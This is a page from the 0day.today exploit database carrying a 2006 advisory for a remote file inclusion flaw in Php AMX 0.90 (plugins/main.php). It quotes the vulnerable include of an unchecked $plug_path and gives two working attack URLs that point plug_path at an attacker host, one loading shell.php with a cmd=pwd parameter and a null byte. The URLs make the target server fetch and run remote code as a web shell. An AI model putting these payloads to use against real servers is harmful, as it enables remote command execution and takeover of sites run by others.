[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Php AMX 0.90 (plugins/main.php) Remote File Include Vulnerability

Author
MP
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1021
Category
web applications
Date add
17-10-2006
Platform
unsorted
=================================================================
Php AMX 0.90 (plugins/main.php) Remote File Include Vulnerability
=================================================================




## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
#                                                               #
#           [ phpamx 0.90 ]                                     #
#                                                               #
# Class:     Remote|Local File Include Vulnerability            #
# Patch:     Unavailable                                        #
# Published  2006/10/18                                         #
# Remote:    Yes                                                #
# Local:     No       						#
# Type:      High                                               #
# Site:      http://sourceforge.net/projects/phpamx/            #
# Author:    MP                                                 #
#        							#
#################################################################

Vuln Code
 (php/plugins/main.php):
<?php
include($plug_path."!playtime_top15.php");
include($plug_path."!mapcycle_list.php");
//nothing here
?>

#Vuln 1.0 -> require register_globals = On
http://victim.com/phpamx-0.9.0/php/plugins/main.php?plug_path=http://attacker.com/


#Vuln 2.0 -> require magic_quotes_gpc = Off
http://victim.com/phpamx-0.9.0/php/plugins/main.php?plug_path=http://attacker.com/shell.php?cmd=pwd%00



#  0day.today [2024-12-25]  #